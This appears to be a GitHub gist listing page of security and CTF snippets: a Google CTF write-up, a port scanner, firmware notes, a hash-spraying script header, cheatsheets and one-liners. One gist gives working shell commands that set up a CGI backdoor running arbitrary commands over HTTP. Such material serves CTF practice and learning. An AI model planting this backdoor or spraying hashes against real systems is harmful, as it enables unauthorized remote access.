Skip to content

Instantly share code, notes, and snippets.

View 0dayCTF's full-sized avatar
😃
Hacking the planet 🚀

Ryan Montgomery 0dayCTF

😃
Hacking the planet 🚀
5.3k followers · 20 following
View GitHub Profile
@szymex73
szymex73 / 00-writeup.md
Last active July 5, 2022 20:05
Google CTF 2022 - Engraver

Engraver

Engraver was a hardware challenge on Google CTF 2022 that involved recovering movements of a robotic arm engraving the flag from a pcap dump of commands sent to the device.

For the challenge, we were given the mentioned pcap containing USB traffic and two images of the robot arm (one of the robot arm idle, one during the engraving process).

Taking a look at the PCAP

The provided PCAP file contains a dump of USB traffic from a specific USB device. We can see the typical USB configuration packets being sent at the beginning (host fetching the USB descriptors) and afterward we see a lot of URB interrupts from the host with HID data attached. USB traffic

Figuring out the hardware part

@f11snipe
f11snipe / portscan.ts
Created June 22, 2022 06:50
Simple tcp port scanner poc in typescript
import net from 'net';
import async from 'async';
const { VMIP = '127.0.0.1', PORTS = '1-65535' } = process.env;
const MAX_SCANS = 4096;
const SCAN_HOST = VMIP;
const TIMEOUT = 2000;
const report: { [port: number]: string } = {};
const ports: number[] = [];
const groups: string[] = PORTS.split(',');
@djsime1
djsime1 / fz_forks.md
Last active November 18, 2024 18:34
Flipper Zero firmware differences

This document has moved!

This comparison list has been relocated into the Awesome Flipper Zero repository. While you can read still read an archived version in this gist, all future updates will take place in the new repository.

Last archived version (Adapted from Nano's original messages in the Unleashed firmware Discord.)

Flipper Zero firmware differences

:: Last updated July 10 2022. ::

@Flangvik
Flangvik / PKI_Abuse_cheatsheet.md
Last active August 26, 2023 13:22
PKI Abuse CheatSheet
@0xjbb
0xjbb / tgtspray.sh
Last active December 25, 2020 01:09
TGTSpray. A tool to spray hashes when smb/winrm lock you out :(
#!/usr/bin/bash
# made by 0xjb, definitely not made for any ctf boxes
# Hash spraying when crackmapexec locks you out :(
# Is it good? no
# Did it work for me in a time of need? yes.
# Will it work for you? ¯\_(ツ)_/¯
if [ "$#" -ne 2 ];then
echo "Usage: $0 <DOMAIN/User> <File of NTLM hashes 'hash:hash'>"
@MarkBaggett
MarkBaggett / gist:38dcff6a0975f148aa858e924d64c492
Created November 14, 2020 18:22
http.server cgi backdoor
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi
@johnnypea
johnnypea / useful-one-liners.sh
Last active June 2, 2025 14:16
Useful one liners
# Run the last command as root
sudo !!
# Serve current directory tree at http://$HOSTNAME:8000/
python -m SimpleHTTPServer
# Save a file you edited in vim without the needed permissions
:w !sudo tee %
# change to the previous working directory
cd -
# Runs previous command but replacing
^foo^bar
@AvasDream
AvasDream / htb.md
Last active February 5, 2025 04:39
Cheatsheet for HackTheBox

Purpose

Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.

Because a smart man once said:

Never google twice.

Linux General

@apolloclark
apolloclark / Kali 2016.1, Docker Install script
Last active February 23, 2022 15:10
#!/bin/bash
# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get purge lxc-docker*
sudo apt-get purge docker.io*